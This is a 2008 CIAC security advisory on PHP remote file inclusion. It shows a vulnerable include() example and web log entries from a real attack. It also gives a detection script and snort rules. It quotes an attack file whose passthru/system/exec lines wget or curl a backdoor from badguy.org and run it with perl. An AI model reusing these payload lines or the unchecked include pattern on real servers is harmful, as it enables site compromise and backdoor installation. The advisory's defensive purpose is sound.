January 29, 2008 18:00 GMT
Revised: Febuary 14, 2008 18:00 GMT
| PROBLEM: | Unsanitized inputs in PHP programs allow intruders to compromise web servers. |
| PLATFORM: | Web servers with PHP driven pages such as Wikis. |
| ABSTRACT: | Many websites use the PHP programming language to build web pages on the fly from individual files and from values obtained from a database. PHP is widely used to create websites with active content, such as Wikis like MediaWiki used to build Wikipedia. If the PHP programs that generate the web pages are not carefully crafted to check user input before it is used, an intruder could inject code into a page and get it executed, leading to compromise of the website. |
| LINKS: | |
| CIAC BULLETIN: | http://www.ciac.org/ciac/techbull/CIACTech08-001.shtml |
| OTHER LINKS: | SQL Injection - http://www.ciac.org/ciac/techbull/CIACTech06-001.shtml |
[Revised 2/14/08 Added snort rules]
Many websites use the PHP programming language to build web pages on the fly from individual files and from values obtained from a database. PHP based websites are widely used to create Wikis such as MediaWiki used for Wikipedia. If the PHP programs that generate the web pages are not carefully crafted to check user input before it is used, an intruder could inject code into a page and get it executed. In addition, web sites that use a database run the risk of having SQL Injection attacks compromise a system or corrupt the database (See CIACTech06-001 for more information about SQL Injection attacks.)
A PHP based website is exploited by having an intruder inject code into a PHP script and getting that code to run. For example, if a web page is created by wrapping a standard header and footer around an individual page, the program index.php that is called to create that page might look like the following.
<?php
$page = ($_GET['page']) ? $_GET['page'] : "404.php";
?>
<html>
<head>
<title>My web Page</title>
</head>
<body>
--- html code that creates the page header ---
<?php include($page); ?>
--- html code that creates the page footer ---
</body>
</html>
You would call this page with a url like,
http://mysite.com/index.php?page=mypage.html
Here, mypage.html contains the page contents you want inserted between the header and footer. The PHP code on the web page is the code between the <? and ?> tags. The first block of code checks to see if the variable page has been defined. If page is defined, its contents are stored in the variable $page otherwise the contents of a 404 file not found error page is stored there. The second block of PHP code inserts the contents of $page in the middle of the web page that is being created and returned to the user.
Notice that the contents of $page is only being checked to see if it exists and not that it contains legitimate code. A designer may think that since he creates all the links to index.php that he knows the contents and does not need to check them but any user can type any value he desires in his web browser and that value will be used in index.php, including more php code that will be executed.
PHP has a configuration option called allow_url_fopen which, if set to true, allows you to use a URL in a variable and that URL will be followed to get the code to insert. This is an extremely dangerous option to allow to be true and should be set to false wherever possible. If allow_url_fopen is true, you can call index.php with a URL like the following,
http://mysite.com/index.php?page=http://evilsite.com/evil.php
PHP will dutifully follow the link and insert evil.php into the middle of the web page and run any code found there.
While analyzing a recent series of attacks on a system, we saw two different attack methodologies used. The first, downloads, writes to disk, and executes a backdoor program that is used to continue the compromise of the site. The second uses a backdoor program written in PHP, which runs only in memory, repeatedly compromising the system every time a backdoor command is issued.
This first attack method used three different connections to get malicious code on a system and get it run. First, we see in the web logs connections like the following,
xxx.xxx.xxx.xxx - - [16/Jan/2008:14:44:17 -0800] "GET /index.php?page=
http:/badguy.org/data/attack.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805"
From the user agent string at the end of the log (libwww-perl/5.805) you can tell that this attack was generated by a script rather than by a user typing into a web browser. Here, the attack is attempting to insert the contents of attack.txt into the page generated by index.php, allowing it run. While this attack may generate a 404 (page not found) error, that does not prove that the attack did not work, only that it did not return a result.
Attack.txt contains lines like the following,
<?
@passthru('cd /tmp;wget http:/badguy.org/ data/backdoor.txt;perl backdoor.txt;rm -f backdoor.txt*');
@passthru('cd /tmp;curl -O http:/badguy.org /data/backdoor.txt;perl backdoor.txt;rm -f backdoor.txt*');
@system('cd /tmp;wget http:/badguy.org/data/backdoor.txt;perl backdoor.txt;rm -f backdoor.txt*');
@system('cd /tmp;curl -O http:/badguy.org/data/backdoor.txt;perl backdoor.txt;rm -f backdoor.txt*');
@exec('cd /tmp;wget http:/badguy.org/ data/backdoor.txt;rm -f backdoor.txt*');
@exec('cd /tmp;curl -O http:/badguy.org/ data/backdoor.txt;perl backdoor.txt;rm -f backdoor.txt*');
@shell_exec('cd /tmp;wget http:/badguy.org/data/backdoor.txt;perl backdoor.txt;rm -f backdoor.txt*');
@shell_exec('cd /tmp;curl -O http:/badguy.org/data/backdoor.txt;perl backdoor.txt;rm -f backdoor.txt*');
?>
As you can see, attack.txt is trying four different PHP commands and two different download methods to try and get backdoor.txt on a system. It first changes to the /tmp directory. It then downloads the file and runs it under perl. When the program quits, backdoor.txt is deleted, hiding the fact that it was there.
The file backdoor.txt turned out to be a backdoor program that opens an IRC channel for command and control. Note that attack.txt and backdoor.txt were not given such obvious names but, instead, were things like a.txt or me.jpg to obfuscate their true use. It does not seem to matter what the file name is as PHP deals only with the contents.
The second type of attack starts much like the first one, with a URL to a file inserted into a PHP variable in an attempt to get it downloaded and run. In this case, the downloaded file is the backdoor written in PHP code. If the exploit works, the exploit code is written into the memory image of the web page that is going to be returned to the attacker. The attacker sees a web page appear with the backdoor commands displayed on it (see below). Choosing a command runs the original exploit again but includes some additional values that trigger whatever the command was supposed to do. Again, the web page appears but this time with the results of the chosen command.

This kind of attack only runs in memory and does not leave files on the system like the first attack unless the intruder uses the backdoor to put files there.
Detecting the attacks is difficult as most of the queries appear to be normal web requests. While you could look for known bad domains and IP addresses, they tended to change quite often and are not a good indicator of attacks.
The web logs turn out to be a good location for searching for attacks. First, be sure you have turned on extended web logs. Extended logs include the user agent string and the referrer string. Grep these logs for the user agent string "libwww-perl". Hits on this string are scripts that are sending queries to your site, which may or may not be malicious.
In the logs that are returned, you must look for strings of the form,
GET <name>.php?<variable>=<url>
where <name> is the name of some php file, <variable> is some variable, and <url> is a fully qualified link to a file on some web or ftp site. For example,
GET /index.php?page=http:/badguy.org/data/attack.txt
Unless you allow sending external links to your website, logs of this type are likely attacks.
Another possibility is to use a regular expression to search for the string above. Doing this will also find those attacks that are not sent with a script and those that are sent with a script but are obfuscating that fact by changing the user agent string.
Create the following findattacks script on a unix system,
for filename ; do echo $filename strings $filename | egrep "GET.*php.*http" | egrep -v search\.php | egrep -v '\"GET' done
call this script in the web logs directory with,
./findattacks access_log*
The first egrep command searches for GET followed by some characters, followed by php, followed by some characters, followed by http. This often finds too many things so the second two egrep commands remove any hits that involve search.php or that have a Referrer string (starts with "GET ). You will need to change these as needed depending on how your site does things.
The strings command in the script is not necessary to search web logs, which are already all text but is included so that this script can also be used to search binary packet capture (pcap) files. The strings command extracts the strings from the binary files so they can be searched by the egrep command.
A snort signature could be built along the same lines as these scripts. All of these tend to have a large number of false positives so you must look at the captured logs to determine if they are really an attack. Again, the error values in the logs are not a good indicator of the success or not of an attack.
Note that with the second type of attack described above, you will get a similar web log every time a command is chosen on the attack page. The original attack URL will be repeated but with a POST action instead of GET. For example,
xxx.xxx.xxx.xxx - - [16/Jan/2008:14:44:17 -0800] "GET /index.php?page=
http:/badguy.org/data/attack.txt HTTP/1.1" 200 78
xxx.xxx.xxx.xxx - - [16/Jan/2008:14:45:22 -0800] "POST /index.php?page=
http:/badguy.org/data/attack.txt HTTP/1.1" 200 32039
xxx.xxx.xxx.xxx - - [16/Jan/2008:14:46:13 -0800] "POST /index.php?page=
http:/badguy.org/data/attack.txt HTTP/1.1" 200 32021
The following snort rules are available from Emerging Threats (Bleeding Snort) to detect these attacks. We have been told that they have few flse positives.
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB PHP Remote File Inclusion (monster list http)"; flow:established,to_server; uricontent:".php"; nocase; uricontent:"http"; nocase; pcre:"/(path|page|lib|dir|file|root|icon|lang(uage)?|folder|type|agenda|gallery| domain|calendar|settings|news|name|auth|prog|config|cfg|incl|ext|fad|mod|sbp|rf| id|df|[a-z](\[.*\])+)\s*=\s*https?/Ui"; reference:url,www.sans.org/top20/; classtype:web-application-attack; sid:2002997; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB PHP Remote File Inclusion (monster list ftp)"; flow:established,to_server; uricontent:".php"; nocase; uricontent:"ftp\:"; nocase; pcre:"/(path|page|lib|dir|file|root|icon|lang(uage)?|folder|type|agenda|gallery| domain|calendar|settings|news|name|auth|prog|config|cfg|incl|ext|fad|mod|sbp|rf|id| df|[a-z](\[.*\])+)\s*=\s*ftp/Ui"; reference:url,www.sans.org/top20/; classtype:web-application-attack; sid:2003098; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB PHP Remote File Inclusion (monster list php)"; flow:established,to_server; uricontent:".php"; nocase; uricontent:"php"; nocase; pcre:"/(path|page|lib|dir|file|root|icon|lang(uage)?|folder|type|agenda|gallery| domain|calendar|settings|news|name|auth|prog|config|cfg|incl|ext|fad|mod|sbp|rf| id|df|[a-z](\[.*\])+)\s*=\s*php/Ui"; reference:url,www.sans.org/top20/; classtype:web-application-attack; sid:2003935; rev:2;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET EXPLOIT WEB PHP remote file include exploit attempt"; flow: to_server,established; content:"GET"; nocase; depth:3; uricontent:".php?"; nocase; pcre:"/=(https?|ftps?|php)\:\//Ui"; nocase; content:"cmd="; nocase; within: 100; classtype: attempted-admin; sid: 2001810; rev:21;)
This problem is caused by PHP scripts that do not adequately check values passed to them from the user. To protect yourself from being compromised by these attacks,
PHP based web sites are a fact of life with many Wikis and other sites based on it. While PHP is very powerful language for creating websites, that power can be used to compromise a site if it is not carefully implemented. Developers need to be particularly careful of strings that a user can change and pass through to the PHP code. He must insure that what is contained in the strings is what he expects and he must prevent any unexpected strings from being used to inject code into his scripts. Turning off the allow_url_fopen option is a good start in protecting a site if that functionality is not needed.
Thanks to David Bianco of Jefferson Lab for pointing out the Snort Rules.
Voice: +1 925-422-8193 (7 x 24)
FAX: +1 925-423-8002
STU-III: +1 925-423-2604
E-mail: ciac@llnl.gov
World Wide Web: http://www.ciac.org/
http://ciac.llnl.gov
(same machine -- either one will work)
Anonymous FTP: ftp.ciac.org
ciac.llnl.gov
(same machine -- either one will work)